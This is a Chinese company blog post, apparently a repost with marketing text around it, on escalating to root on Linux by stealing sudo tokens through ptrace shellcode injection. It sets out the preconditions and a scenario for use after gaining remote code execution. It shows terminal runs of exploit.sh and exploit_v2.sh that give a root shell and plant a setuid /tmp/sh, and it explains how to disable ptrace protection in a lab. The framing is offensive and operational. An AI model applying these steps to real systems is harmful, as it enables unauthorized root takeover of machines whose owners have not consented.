小編給大家分享一下linux中如何利用sudo token實現(xiàn)提權(quán)，希望大家閱讀完這篇文章之后都有所收獲，下面讓我們一起去探討吧！

“專業(yè)、務(wù)實、高效、創(chuàng)新、把客戶的事當成自己的事”是我們每一個人一直以來堅持追求的企業(yè)文化。 創(chuàng)新互聯(lián)建站是您可以信賴的網(wǎng)站建設(shè)服務(wù)商、專業(yè)的互聯(lián)網(wǎng)服務(wù)提供商! 專注于做網(wǎng)站、成都網(wǎng)站設(shè)計、軟件開發(fā)、設(shè)計服務(wù)業(yè)務(wù)。我們始終堅持以客戶需求為導向，結(jié)合用戶體驗與視覺傳達，提供有針對性的項目解決方案，提供專業(yè)性的建議，創(chuàng)新互聯(lián)建站將不斷地超越自我，追逐市場，引領(lǐng)市場！

如何利用系統(tǒng)中的漏洞？

$sudo whatever
[sudo]password for user:    # Press+c since you don't have the password. # This creates an invalidsudo tokens.
$ sh exploit.sh
....wait 1 seconds
$sudo -i # no password required :)
# id
uid=0(root)gid=0(root) groups=0(root)

實現(xiàn)要求

1、 完全啟用Ptrace（/proc/sys/kernel/yama/ptrace_scope == 0）；

2、 當前用戶必須開啟一個擁有有效sudo令牌并且相同uid的活動進程；

注：默認密碼的超時時間為15分鐘，如果你在15分鐘內(nèi)使用sudo兩次，系統(tǒng)就不會要求你再輸入用戶的sudo密碼了。

工作機制

項目目錄中的Exploit.sh會向當前用戶的所有進程注入Shell代碼，并使用它們的sudo令牌來驗證我們自己的sudo口令。僅需三行Shell代碼，一切皆有可能。

使用樣例

假設(shè)，你拿到了一個RCE，而且沒有用戶密碼，但目標用戶使用了sudo，那么你就可以通過竊取他的sudo令牌來實現(xiàn)提權(quán)啦！

如何在實驗環(huán)境中模擬？

#echo 0 > /proc/sys/kernel/yama/ptrace_scope
# #Don't worry this is not persistent accross reboot

打開兩個終端窗口：

1、 其中一個執(zhí)行sudo命令，然后輸入正確的用戶密（sudo ls）；

2、 另一個按照上述方法執(zhí)行漏洞利用代碼；

使用exploit_v2.sh在/tmp/sh中創(chuàng)建一個suid sh

如果exploit_v1無法成功的話，大家可以嘗試一下exploit_v2.sh：

$./exploit_v2.sh
Currentprocess : 2441
chmod:changing permissions of 'activate_sudo_token': Operation not permitted
Injectingprocess 1721 -> bash
Injectingprocess 2433 -> bash
cat:/proc/2446/comm: No such file or directory
Injectingprocess 2446 ->
$/tmp/sh -p
# id
uid=1001(test)gid=1001(test) euid=0(root) egid=0(root) groups=0(root),1001(test)

看完了這篇文章，相信你對“l(fā)inux中如何利用sudo token實現(xiàn)提權(quán)”有了一定的了解，如果想了解更多相關(guān)知識，歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道，感謝各位的閱讀！